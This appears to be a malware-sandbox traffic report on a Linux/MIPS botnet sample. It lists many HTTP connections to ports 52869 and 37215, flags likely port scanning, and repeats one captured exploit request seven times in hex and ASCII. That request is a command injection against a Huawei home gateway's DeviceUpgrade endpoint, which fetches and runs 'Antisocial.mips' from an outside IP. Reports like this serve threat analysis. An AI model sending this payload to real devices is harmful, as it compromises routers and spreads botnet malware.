Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 38808
Source: unknown	Network traffic detected: HTTP traffic on port 41500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 57186
Source: unknown	Network traffic detected: HTTP traffic on port 59356 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34758 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52676 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58880 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59592 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59356 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 45190
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 45198
Source: unknown	Network traffic detected: HTTP traffic on port 45106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56972 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59356 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45640 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52682 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46128 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47200 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42410 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54040 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42410
Source: unknown	Network traffic detected: HTTP traffic on port 42446 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42446
Source: unknown	Network traffic detected: HTTP traffic on port 42382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42364 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37256 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53042 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42396 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45952 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59356 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47736 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42874 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56972 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42364 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34758 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47736 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51738 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42396 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52484 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59426 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47736 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51738 -> 52869

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 91.91.141.51 ports 2,5,6,8,9,52869

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
